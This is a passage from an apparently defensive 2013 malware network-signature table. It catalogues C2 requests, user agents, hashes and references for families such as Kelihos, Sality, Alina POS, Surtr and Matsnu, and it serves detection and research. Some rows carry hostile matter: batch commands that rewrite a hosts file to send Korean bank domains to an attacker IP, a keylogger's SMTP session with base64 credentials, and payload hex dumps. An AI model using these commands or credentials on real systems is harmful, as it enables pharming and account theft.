ibs.kfcc.co.kr>>%systemroot%\system32\drivers\etc\hosts.ics echo 67.198.255.93.ibs.kfcc.co.kr>>%systemroot%\system32\drivers\etc\hosts.ics echo 67.198.255.93 online.keb.co.kr>>%systemroot%\system32\drivers\etc\hosts.ics echo 67.198.255.93.online.keb.co.kr>>%systemroot%\system32\drivers\etc\hosts.ics echo 67.198.255.93 open.hanabank.com>>%systemroot%\system32\driver.... etc | 845b0945d5fe0e0aaa16234dc21484e0 | http://my.opera.com/cjbi/blog/index.dml/tag/Tijcont | http://bit.ly/crimesamples | http://bit.ly/crimepcaps | http://contagioexchange.blogspot.com/2013/09/tijcont-strings-CRIME.html | 9/8/2013 | |
71 | 2013-09-08 | APT | Darkcomet | GET | /a.php?id=c2ViYWxpQGxpYmVyby5pdA== | /a.php?id= | /a.php?id=c2ViYWxpQGxpYmVyby5pdA== Host: [ip.address] | none | dc98abba995771480aecf4769a88756e | http://www.contextis.com/research/blog/malware-analysis-dark-comet-rat/ | http://bit.ly/aptsamples | http://bit.ly/aptpcaps | http://contagioexchange.blogspot.com/2013/09/dark-comet-strings-apt.html | 9/8/2013 | |||
72 | 2013-09-08 | CRIME | Kelihos | GET | /index.htm | /index.htm | Host: 188.129.243.106 Content-Length: 164 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:21.0) Gecko/20130331 Firefox/21.0 ..D.lUUE..H@.q..#.....K.zfgE0F.A..K. Variants: /default.htm ** /file.htm ** /home.htm ** /index.htm ** /install.htm ** /login.htm ** /main.htm ** /online.htm ** /search.htm ** /setup.htm ** /start.htm ** /index.htm | Mozilla/1.22 (compatible; MSIE 10.0; Windows 3.1) Mozilla/5.0 (compatible; MSIE 10.0; Macintosh; Intel Mac OS X 10_7_3; Trident/6.0) Mozilla/5.0 (iPad; CPU OS 5_1 like Mac OS X) Mozilla/5.0 (Macintosh; Intel Mac OS X 10.8; rv:21.0) Mozilla/5.0 (Macintosh; Intel Mac OS X 10_6_8) Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_3) Mozilla/5.0 (Windows NT 5.0; rv:21.0) Mozilla/5.0 (Windows NT 5.1) Mozilla/5.0 (Windows NT 5.1; rv:21.0) Mozilla/5.0 (Windows NT 6.1; rv:21.0) Mozilla/5.0 (Windows NT 6.1; rv:22.0) Mozilla/5.0 (Windows NT 6.1; WOW64; rv:21.0) Mozilla/5.0 (Windows NT 6.2) Mozilla/5.0 (Windows NT 6.2; rv:21.0) Mozilla/5.0 (Windows NT 6.2; WOW64) Mozilla/5.0 (X11; Linux i686; rv:21.0) Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:21.0) Opera/9.80 (Windows NT 5.1; U; zh-sg) Opera/9.80 (Windows NT 6.0) Opera/9.80 (Windows NT 6.1; U; es-ES) | 1052 | C94DC5C9BB7B99658C275B7337C64B33 | http://www.microsoft.com/security/portal/threat/encyclopedia/Entry.aspx?Name=Backdoor%3AWin32%2FKelihos.F#tab=2 | http://bit.ly/crimesamples | http://bit.ly/crimepcaps | http://contagioexchange.blogspot.com/2013/09/kelihos-strings-CRIME.html | 9/8/2013 | ||
73 | 2013-08-27 | CRIME | Kuluoz Run command from C2 | n | c=run&u=/get/7d2c37d2070e1b38 6070db8c851dae08.exe&crc= 9e2b9c4f465 b765fc971423935c4b68e | &crc= | HTTP/1.1 200 OK Server: nginx/1.2.6 Date: Tue, 27 Aug 2013 20:06:57 GMT Content-Type: text/html Content-Length: 86 Connection: close X-Powered-By: PHP/5.4.4-7 Vary: Accept-Encoding | ||||||||||
74 | 8/22/2013 23:58:00 <p> 2015-02-03 | APT | njRAT / Backdoor.LV | <p> lv|'|'|TndfQzQyNjRFQkI =|'|'|VICTIM|'|'| Examiner|'|'|2013-06-21|'|'|USA|'|'| Win XP ProfessionalSP2 ... <p> 171.ll|'|'|Li4uLi4uLk5FVy4 uLi4u Li4uX0F FNTJDMzdE|'|'|SENTA|'|'| sentai55|'|'|15-01-29|'|'||'|'| Win 8.1SP0 x64|'|'|Yes|'|'|0.7d| '|'|..|'|'||'|'|b88ece4c04f706 c9717bbe6fb da49ed2,132.inf|'|'|Li4uLi4uLk5FVy4uL i4uLi4uDQpyZWVlZWVk LmR5bmRucy5iaXo6M jUyNTQNCkFwcERhdGENCldpbnJhci5leG UNClRydWUNCkZhbHNlDQpU cnVlDQpGYWxzZQ==0. <p> 251.ll|'|'|Li4uLi4uLk5FVy4uLi4uLi4uX 0FFNTJD MzdE|'|'|SENTA|'|'|senta i55|'|'|15-01-29|'|'||'|'|Win 8.1SP0 x64|'|'|Yes|'|'|0.7d|'|'|..|'|'|QnVyd 2V sbCB2LiBIb2JieSBMb2JieSBBYnJp ZGdlZCBbQ29tcGF0aWJpbGl 0eSBNb 2RlXSAtIFdvcmQA|'|'|b88ece4c04f706c9717bbe6fbda49ed2, <p>lv|'|'|VHJvamFuX0M0NkY2RTk= |'|'|MARK|'|'|user |'|'|2013-11-22|'|'||'|'|Win XP|'|'|No|'|'|0.6.4|'|'|..|'|'||'|'|[endof] | <p> lv <p> 171.ll <p> 251.ll | 1d3baedd747f6f9bf92c81eb9f63b34b | http://www.threatgeek.com/2013/06/fidelis-threat-advisory-1009-njrat-uncovered.html | http://bit.ly/aptsamples | http://contagioexchange.blogspot.com/2013/08/njrat-backdoorlv-strings-apt.html | 6/13/2013 | CK | ||||||
75 | 2013-08-21 | CRIME | Chimerka.1 / Refyes.A | POST | /sys.php | /sys.php | Host: rxform.org Content-type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.0.1) Gecko/20021216 Chimera/0.6 Referer: http://www.gmail.com Content-length: 112 | Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.0.1) Gecko/20021216 Chimera/0.6 | bede0da1abc1122acf8af91f6d6b289f | http://www.microsoft.com/security/portal/threat/encyclopedia/entry.aspx?Name=Trojan:Win32/Refeys.A#tab=2 | http://bit.ly/crimesamples | http://contagioexchange.blogspot.com/2013/08/refeysa-strings-CRIME.html | 8/1/2013 | ||||
76 | 2013-08-21 | CRIME | Sality | GET | /images/logos.gif?1f5428=8212640 | /logos.gif? | User-Agent: Opera/9.50 (Windows NT 6.0; U; en) Host: boyabateml.k12.tr Cache-Control: no-cache | Opera/9.50 (Windows NT 6.0; U; en) Opera/8.89 (Windows NT 6.0; U; en) Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.1 (.NET CLR 3.5.30731) Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50728) | 176222923eaa64b43b4f75f8afaad81e a972f612afa03f1d0b3ffad10843e935 4f693f209daccf69b1c785573c0002c5 | 8/1/2013 | |||||||
77 | 2013-08-19 | CRIME | Nitedrem | GET | /down.asp?action=install&u=cpmcpm&p= 2366A64BAA384EA6AB9CEF73E8E2BE12&t =7393 | /down.asp?action=install&u= | User-Agent: fucking Host: bucks.onepiecedream.com:99 | fucking | 80,88,99 | 508af8c499102ad2ebc1a83fdbcefecb | http://about-threats.trendmicro.com/Malware.aspx?id=54252&name=TROJ_NITEDREM.AB&language=en | http://bit.ly/crimesamples | http://bit.ly/crimepcaps | http://contagioexchange.blogspot.com/2013/08/nitedrem-strings-CRIME.html | 8/1/2013 | ||
78 | 2013-08-19 | CRIME | Nitedrem | GET | /upx/kod.txt?k=123&t=7215 | /kod.txt?k=123&t= | User-Agent: fucking Host: 103.20.193.231:88 | User-Agent: fucking | 80,88,99 | 508af8c499102ad2ebc1a83fdbcefecb | http://about-threats.trendmicro.com/Malware.aspx?id=54252&name=TROJ_NITEDREM.AB&language=en | http://bit.ly/crimesamples | http://bit.ly/crimepcaps | http://contagioexchange.blogspot.com/2013/08/nitedrem-strings-CRIME.html | 8/1/2013 | ||
79 | 2013-08-19 | CRIME | Nitedrem | GET | ...............2817324n-79s4-43q8-8n2n-676s3qr1ops5:............... | ...............2817324n-79s4-43q8-8n2n-676s3qr1ops5:............... | 80,88,99 | 508af8c499102ad2ebc1a83fdbcefecb | http://about-threats.trendmicro.com/Malware.aspx?id=54252&name=TROJ_NITEDREM.AB&language=en | http://bit.ly/crimesamples | http://bit.ly/crimepcaps | http://contagioexchange.blogspot.com/2013/08/nitedrem-strings-CRIME.html | 8/1/2013 | ||||
80 | 2013-08-19 | CRIME | Nitedrem | GET | /config.txt?&t=4593 | /config.txt?&t= | User-Agent: Update Host: in.onepiecedream.com:99 Cache-Control: no-cache | Update | 80,88,99 | 508af8c499102ad2ebc1a83fdbcefecb | http://about-threats.trendmicro.com/Malware.aspx?id=54252&name=TROJ_NITEDREM.AB&language=en | http://bit.ly/crimesamples | http://bit.ly/crimepcaps | http://contagioexchange.blogspot.com/2013/08/nitedrem-strings-CRIME.html | 8/1/2013 | ||
81 | 2013-08-19 | CRIME | Nitedrem | GET | /fish.jpg?&t=4426 | /fish.jpg?&t= | User-Agent: Update Host: www.dianwofacai.com Cache-Control: no-cache | Update | 80,88,99 | 508af8c499102ad2ebc1a83fdbcefecb | http://about-threats.trendmicro.com/Malware.aspx?id=54252&name=TROJ_NITEDREM.AB&language=en | http://bit.ly/crimesamples | http://bit.ly/crimepcaps | http://contagioexchange.blogspot.com/2013/08/nitedrem-strings-CRIME.html | 8/1/2013 | ||
82 | 2013-08-17 | CRIME | Sality | GET | /?12da89=12355930 | /?12da89= | User-Agent: KUKU v5.06exp =9355466431 Host: www.kjwre9fqwieluoi.info Cache-Control: no-cache | KUKU v5.06exp =9355466431 | CEAF4D9E1F408299144E75D7F29C1810 | http://www.symantec.com/connect/blogs/all-one-malware-overview-sality | http://bit.ly/crimesamples | http://bit.ly/crimepcaps | http://contagioexchange.blogspot.com/2013/08/sality-strings-CRIME.html | 8/1/2013 | |||
83 | 2013-08-17 | CRIME | Sality | GET | /images/logos.gif?114bbc=9068000 | /logos.gif? | User-Agent: KUKU v5.06exp =9355466431 Host: hayatspa.com Cache-Control: no-cache | User-Agent: KUKU v5.06exp =9355466431 | CEAF4D9E1F408299144E75D7F29C1810 | http://www.symantec.com/connect/blogs/all-one-malware-overview-sality | http://bit.ly/crimesamples | http://bit.ly/crimepcaps | http://contagioexchange.blogspot.com/2013/08/sality-strings-CRIME.html | 8/1/2013 | |||
84 | 2013-08-17 | CRIME | Sality | GET | /setting.doc | /setting.doc | Host: yahoo.com Cache-Control: no-cache | CEAF4D9E1F408299144E75D7F29C1810 | http://www.symantec.com/connect/blogs/all-one-malware-overview-sality | http://bit.ly/crimesamples | http://bit.ly/crimepcaps | http://contagioexchange.blogspot.com/2013/08/sality-strings-CRIME.html | 8/1/2013 | ||||
85 | 2013-08-16 | CRIME | Torpig /Sinowal miniloader | GET | / | Host: 166.78.144.80 Accept: image/gif, image/jpeg, image/pjpeg, image/pjpeg, */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0) Content-Type: application/x-www-form-urlencoded Accept-Encoding: gzip, deflate Cache-Control: no-cache Content-Length: 247 Connection: close | Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0) | 011C1CA6030EE091CE7C20CD3AAECFA0 | http://blog.fox-it.com/2012/03/16/post-mortem-report-on-the-sinowallnu-nl-incident/ | http://bit.ly/crimesamples | http://bit.ly/crimepcaps | http://contagioexchange.blogspot.com/2013/08/torpig-miniloader-strings-CRIME.html | 8/1/2013 | ||||
86 | 2013-08-16 | CRIME | Torpig /Sinowal miniloader | GET | /search2?fr=altavista&itag=ody&q= b88d6ce7e9fe419788716298cc747adc %2C93a5d8146fea0bbb&kgs=1&kls=0 | /search2?fr= | Content-Type: application/x-www-form-urlencoded Host: annotatinggramma.info Content-Length: 2804 Connection: Keep-Alive Cache-Control: no-cache | 011C1CA6030EE091CE7C20CD3AAECFA0 | http://blog.fox-it.com/2012/03/16/post-mortem-report-on-the-sinowallnu-nl-incident/ | http://bit.ly/crimepcaps | http://contagioexchange.blogspot.com/2013/08/torpig-miniloader-strings-CRIME.html | 8/1/2013 | |||||
87 | 2013-08-13 | CRIME | EK Popads | GET | /?7d456d68729292e9843cb9dde2d2f7b4=34 | /? | /?7d456d68729292e9843cb9dde2d2f7b4=34 Accept: image/gif, image/jpeg, image/pjpeg, image/pjpeg, application/x-shockwave-flash, application/xaml+xml, application/vnd.ms-xpsdocument, application/x-ms-xbap, application/x-ms-application, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, */* Referer: http://creditforums.com/discover-card/2648-why-so-hard-get-approved-discover-card.html Accept-Language: en-us User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.5; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; MDDR; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; InfoPath.2; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET4.0C; .NET4.0E) Accept-Encoding: gzip, deflate Host: xrp.8taglik.info Connection: Keep-Alive | some payload TTF:CVE-2011-3402 8b0c74e2c558d604b5443c7ad8c3aeb6.eot CVE-2013-0422 ccfabd9cd566790d989e29958485c8c2 | http://www.malwaresigs.com/2013/03/26/popads-exploit-kit/ | http://bit.ly/crimesamples | 8/1/2013 | ||||||
88 | 2013-08-13 | CRIME | EK Popads | GET | /4d23ccceb2cf9e6c1c91df06170259d3/32cd ad27bdec4a68d8efc9bb835008e6.swf | Accept: */* Accept-Language: en-US Referer: http://qkvuz.12taglik.info/?82f98f39d50070ac6bccd765eb93b37e=y15&8d97baff25493bce238a6ac40dbd2dc1=perfectboys.org x-flash-version: 11,7,700,202 Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E) Host: qkvuz.12taglik.info Connection: Keep-Alive | na | some payload TTF:CVE-2011-3402 8b0c74e2c558d604b5443c7ad8c3aeb6.eot CVE-2013-0422 ccfabd9cd566790d989e29958485c8c2 | http://www.malwaresigs.com/2013/03/26/popads-exploit-kit/ | http://bit.ly/crimesamples | 8/1/2013 | ||||||
89 | 2013-08-13 | CRIME | EK Popads | GET | /855feed4acbb99c63ad7f25fef289284/decaff5b6ee 641742f53d8ef8c6f9a16.jar | /855feed4acbb99c63ad7f25fef289284/decaff5b6ee641742f53d8ef8c6f9a16.jar content-type: application/x-java-archive accept-encoding: pack200-gzip,gzip Cache-Control: no-cache Pragma: no-cache User-Agent: Mozilla/4.0 (Windows XP 5.1) Java/1.7.0_07 Host: fizv.11taglik.info Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2 Connection: keep-alive | na | some payload TTF:CVE-2011-3402 8b0c74e2c558d604b5443c7ad8c3aeb6.eot CVE-2013-0422 ccfabd9cd566790d989e29958485c8c2 | http://www.malwaresigs.com/2013/03/26/popads-exploit-kit/ | http://bit.ly/crimesamples | 8/1/2013 | ||||||
90 | 2013-08-13 | CRIME | EK Popads | GET | /?c480cfaa684e1dc0db1b2e1f891d814a= a15&8524421677ca0f8c20fd1cd2c1c6e0a7=sansit.in | /?c480cfaa684e1dc0db1b2e1f891d814a=a15&8524421677ca0f8c20fd1cd2c1c6e0a7=sansit.in Accept: image/gif, image/jpeg, image/pjpeg, image/pjpeg, application/x-shockwave-flash, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, application/x-ms-application, application/x-ms-xbap, application/vnd.ms-xpsdocument, application/xaml+xml, */* Accept-Language: en-us User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; InfoPath.2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET4.0C; .NET4.0E) Accept-Encoding: gzip, deflate Host: tqhsy.8taglik.info Connection: Keep-Alive | na | some payload TTF:CVE-2011-3402 8b0c74e2c558d604b5443c7ad8c3aeb6.eot CVE-2013-0422 ccfabd9cd566790d989e29958485c8c2 | http://www.malwaresigs.com/2013/03/26/popads-exploit-kit/ | http://bit.ly/crimesamples | 8/1/2013 | ||||||
91 | 2013-08-13 | CRIME | EK Popads | GET | /39ff9ff8c3b603d8eed017df64dd2799.eot | Accept: */* Referer: http://fizv.11taglik.info/?0090c763e668fab7bbb1c5576207655f=q10&c561f8448a523af56b17eb9ac7ad7a58=sansit.in Accept-Language: en-us User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.5; .NET4.0C; .NET4.0E; InfoPath.3) Accept-Encoding: gzip, deflate Host: fizv.11taglik.info Connection: Keep-Alive | na | TTF:CVE-2011-3402 8b0c74e2c558d604b5443c7ad8c3aeb6.eot | http://www.malwaresigs.com/2013/03/26/popads-exploit-kit/ | http://bit.ly/crimesamples | 8/1/2013 | ||||||
92 | 2013-08-11 | CRIME | Alina POS v5.6 | POST | /duck/push.php | push.php | Accept: application/octet-stream Content-Type: application/octet-stream Connection: Close User-Agent: Alina v5.6 Host: 208.98.63.226 Content-Length: 82 Cache-Control: no-cache | Alina v5.6 | 5A22ED78B6454E34217D07C4AF37B23B | http://blog.spiderlabs.com/2013/06/alina-following-the-shadow-part-2.html | http://bit.ly/crimesamples | http://bit.ly/crimepcaps | http://contagioexchange.blogspot.com/2013/08/alina-pos-v56-strings-CRIME.html | 2013-06 | |||
93 | 2013-08-11 | CRIME | Alina POS v5.6 | POST | /adobe/version_check.php | /version_check.php | Accept: application/octet-stream Content-Type: application/octet-stream Connection: Close User-Agent: Alina v5.3 Host: 91.229.76.97 Content-Length: 2980 Cache-Control: no-cache | Alina v5.3 | 4c754150639aa3a86ca4d6b6342820be | http://blog.spiderlabs.com/2013/06/alina-following-the-shadow-part-2.html | http://bit.ly/crimesamples | http://bit.ly/crimepcaps | http://contagioexchange.blogspot.com/2013/08/alina-pos-strings-CRIME.html | 2013-06 | |||
94 | 2013-08-11 | CRIME | Alina POS v6.0 | POST | /adobe/version_check.php | /version_check.php | Accept: application/octet-stream Content-Type: application/octet-stream Connection: Close User-Agent: Alina v6.0 Host: 91.229.76.97 Content-Length: 3349 Cache-Control: no-cache | Alina v6.0 | http://blog.spiderlabs.com/2013/06/alina-following-the-shadow-part-2.html | 2013-08 | |||||||
95 | 2013-08-09 | APT (IN) | Hanove / Tourist | POST | /kamp.php | /kamp.php | /kamp.php Content-Type: multipart/form-data; boundary=78DDB5A902BB8FFF3F398B45BEDCD152 User-Agent: SIMPLE Host: http://[xxx] Content-Length: 501 Cache-Control: no-cache --78DDB5A902BB8FFF3F398B45BEDCD152 Content-Disposition: form-data; name="uploaddir" water/USER-6E3C3361930800270A87A2/D/ --78DDB5A902BB8FFF3F398B45BEDCD152 Content-Disposition: form-data; name="filename"; filename="license_23_05_2004_08_10_00.txt" Content-Type: text/plain Content-Transfer-Encoding: binary | SIMPLE | 37207835e128516fe17af3dacc83a00c | 2011:09:21 | |||||||
96 | 2013-08-07 | APT | Surtr 2nd Stage DL | 00000000 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ........ ........ | 00000000 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ........ ........ 00000010 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ........ ........ 00000020 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ........ ........ 00000030 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ........ ........ 00000040 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ........ ........ 00000050 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ........ ........ 00000060 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ........ ........ 00000070 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ........ ........ 00000080 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ........ ........ 00000090 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ........ ........ 000000A0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ........ ........ 000000B0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ........ ........ 000000C0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ........ ........ 000000D0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ........ ........ 000000E0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ........ ........ 000000F0 00 00 00 00 00 00 00 03 af d7 a5 01 23 01 00 00 ........ ....#... 00000100 4a 00 00 00 78 9c 13 65 30 63 30 01 62 73 06 23 J...x..e 0c0.bs.# 00000110 06 0b 06 37 20 e9 06 84 26 0c 06 0c a4 02 00 a8 ...7 ... &....... | 6178, 8089, 9696. | [0x0 padding] [0x5 bytes header] [0x4 bytes for compressed packet length including preceding 0x0s] [0x4 bytes for decompressed packet length + length of preceding 0's] [0x78 0x9c (zlib stream header)] [ compressed data ] 2nd stage traffic | 36E194F7DF2F2FD020E3800AB77F7E82 (2.tmp - payload) 8c06aec37c7e51f581aaa41f66d4ebad (RTF), 21aa9dd44738d5bf9d8a8ecf53c3108c or 21aa9dd44738d5bf9d8a8ecf53c3108c - Stage 2 dl | https://citizenlab.org/2013/08/surtr-malware-family-targeting-the-tibetan-community/ | http://bit.ly/aptsamples | Strings (in stage 2): x86_GmRemote.dll Mark D:\Project\GTProject\Public\List\ListManager.cpp There are multiple stage 2 versions but this is the one we've seen most often. (CitizenLab) | 8/2/2013 | |||||
97 | 2013-08-07 | APT | Surtr 2nd Stage DL | 00000000 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ........ ........ | <removed> 00000100 9c 13 00 00 00 00 00 00 00 50 0e 00 00 4d 5a 90 ........ .P...MZ. 00000110 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 ........ ........ 00000120 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 .....@.. ........ 00000130 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ........ ........ 00000140 00 00 00 00 00 00 00 00 00 00 01 00 00 0e 1f ba ........ ........ 00000150 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 .....!.. L.!This 00000160 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 program cannot b 00000170 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 e run in DOS mod 00000180 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 23 36 31 e....$.. .....#61 | 6178, 8089, 9696. | 2nd stage Download | 36E194F7DF2F2FD020E3800AB77F7E82 (2.tmp - payload) 8c06aec37c7e51f581aaa41f66d4ebad (RTF), 21aa9dd44738d5bf9d8a8ecf53c3108c or 21aa9dd44738d5bf9d8a8ecf53c3108c - Stage 2 dl | https://citizenlab.org/2013/08/surtr-malware-family-targeting-the-tibetan-community/ | http://bit.ly/aptsamples | 8/2/2013 | ||||||
98 | 2013-08-07 | APT | Surtr Initial GET | 00000000 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ........ ........ | 00000000 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ........ ........ <removed>. 00000100 0a 00 00 00 64 00 00 00 00 00 00 00 00 00 ....d... ...... | 6178, 8089, 9696. | Initial GET | 36E194F7DF2F2FD020E3800AB77F7E82 (2.tmp - payload) 8c06aec37c7e51f581aaa41f66d4ebad (RTF), 21aa9dd44738d5bf9d8a8ecf53c3108c or 21aa9dd44738d5bf9d8a8ecf53c3108c - Stage 2 dl | https://citizenlab.org/2013/08/surtr-malware-family-targeting-the-tibetan-community/ | http://bit.ly/aptsamples | Strings (in stage 1): CrtRunTime.log aCvVpR _One.dll _Fra.dll soul LiveUpdata_Mem\ Burn\ | 8/2/2013 | |||||
99 | 2013-07-15 | APT | Taleret | GET | / | / User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) Host: mac.gov.skies.tw Connection: Keep-Alive Cache-Control: no-cache Cookie: MCI=HHMHMBLHEHNLIOJRINRIJPRJIJ; MUID=ba2c08421000e9621000355b0000 | Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) | 443 | FED166A667AB9CBB1EF6331B8E9D7894 5328CFCB46EF18ECF7BA0D21A7ADC02C | http://www.microsoft.com/security/portal/threat/encyclopedia/entry.aspx?Name=TrojanDownloader:Win32/Taleret.D#techdetails_link | http://bit.ly/aptsamples | http://bit.ly/aptpcaps | Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3 DefaultConnectionSettings Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections explorer.exe http://contagioexchange.blogspot.com/2013/08/taleret-strings-apt.html http://contagioexchange.blogspot.com/2013/08/taleret-strings-apt-1.html | 7/1/2013 | |||
100 | 2013-07-15 | APT | Taleret | GET | /jw!Dyz0_2mTExQ0xbBnlp.RZcXoHmU- | User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Win32) Host: tw.myblog.yahoo.com Connection: Keep-Alive Cache-Control: no-cache Cookie: B=8sah02d6on6k9&b=3&s=as | Mozilla/4.0 (compatible; MSIE 6.0; Win32) | FED166A667AB9CBB1EF6331B8E9D7894 5328CFCB46EF18ECF7BA0D21A7ADC02C | http://www.microsoft.com/security/portal/threat/encyclopedia/entry.aspx?Name=TrojanDownloader:Win32/Taleret.D#techdetails_link | http://bit.ly/aptsamples | http://bit.ly/aptpcaps | http://contagioexchange.blogspot.com/2013/08/taleret-strings-apt.html http://contagioexchange.blogspot.com/2013/08/taleret-strings-apt-1.html | 7/1/2013 | ||||
101 | 2013-06-26 | CRIME | Sweet Orange EK | GET | /in.php?q=WPOChVXlw9QiOTwtCbg+ uSk36elyOCiUwI99U0PYxA== | /in.php?q= | /in.php?q=hPOChVXlw9QgOzotCb88uSk36elxMCiVxol9XkXXwg== Accept: text/html, application/xhtml+xml, */* Referer: http://techmedianet.com/server.php?fs=1&w=1280&h=800&q=hPOChVXlw9QgOzotC b88uSk36elxMCiVxol9XkXXwg== Accept-Language: en-us User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.0; Trident/5.0) Accept-Encoding: gzip, deflate Host: emberstat.com Connection: Keep-Alive | User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.0; Trident/5.0) | http://urlquery.net/report.php?id=3120429 http://malforsec.blogspot.com/2013/03/making-orange-jam-analyzing-sweet.html | 6/1/2013 | |||||||
102 | 2013-06-06 | CRIME | ArcomRat / Dokstormac | POST | S_0001[!^]NEW[!^]127.0.0.1[!^]COMPUTERNAME[!^] username[!^]XP[!^]V1.3[!^]IDLE TIME[!^]Active Caption [!^]SPiBlnbspkvj6DQ5dnFrtvvJvNT4a8Y[!^]NO[!^]NO[!^]NO[!^][!^] | S_0001[!^]NEW[!^]127.0.0.1[!^]COMPUTERNAME[!^]username[!^]XP[!^]V1.3[!^]IDLE TIME[!^]Active Caption[!^]SPiBlnbspkvj6DQ5dnFrtvvJvNT4a8Y[!^]NO[!^]NO[!^]NO[!^][!^] | MSIE 7.0 for the file request | 1866 1888 1865 1890 | CRIME or APT? Possiibly some MidEast rat; NO...NO...NO... in the traffic; Preceded by request for a file with odd extensions like .awe or .avf | 62B4C4432361C9B4B69C480C07AFA356 191FDC32304C50D9A054420E59BD21A9 4015DD5B27EB612CA5DC320033E284C5 | http://www.threatexpert.com/report.aspx?md5=62b4c4432361c9b4b69c480c07afa356 http://www.symantec.com/security_response/writeup.jsp?docid=2012-112912-5237-99&tabid=2 | http://bit.ly/crimesamples | unpacked samples have extensive Unicode strings | 2013-05 | |||
103 | 2013-06-06 | CRIME | Ardamax keylogger | SMTP | 220 smtp.mail.yahoo.com ESMTP ready EHLO DELLXT 250-smtp.mail.yahoo.com | 220 smtp.mail.yahoo.com ESMTP ready EHLO DELLXT 250-smtp.mail.yahoo.com 250-PIPELINING 250-SIZE 41697280 250-8 BITMIME 250 AUTH PLAIN LOGIN XYMCOOKIE AUTH LOGIN 334 VXNlcm5hbWU6 bGludXgwNjQwMEB5YWhvby5jb20= 334 UGFzc3dvcmQ6 YXplcnR5LzA2 235 2.0.0 OK MAIL FROM: | 25 | login in base64 | E33AF9E602CBB7AC3634C2608150DD18 | http://www.ardamax.com/keylogger/ | http://bit.ly/crimesamples | http://bit.ly/crimepcaps | 2013-05 | ||||
104 | 2013-06-06 | CRIME | Matsnu - MBR wiping ransomware | POST | /f44/myse.php | /myse.php | /f44/myse.php Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1) Host: twintrade.net Content-Length: 344 Connection: Keep-Alive Cache-Control: no-cache IaTAREu1TfHHoUGCS/mqKHdWfz/L0PzKX8dpzjFoUfvV37klDPOn8KhS1lUdzm/J3kyOJugD4blZFNrw6+5lERjc0hbtCne95tSSWjACXP29rvfspXWDWDxKi17NkSh2x5eCYMIRqMeV8NZhUFtptnZ/gobO3nDnW31beGzC/0X/hzUAyb2Edpy87oPb3ohAup62JPQvqzOH3KLmS/MiVHkHo7Xv3XYHkagkLVGJJrHfhFl1tXpZIf8LOCwuAtOA5FuJC+VbkAgAaYux0Uz7w9kjxL/9jNq7G+g/UMlUwCO4ppEFvmCq/Ps3ElNe7k7IrTZ+uwn6FBCihp08muLj+A== | Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1) | 1B2D2A4B97C7C2727D571BBF9376F54F | http://blog.trendmicro.com/trendlabs-security-intelligence/backdoor-wipes-mbr-locks-screen/ | http://bit.ly/crimesamples | 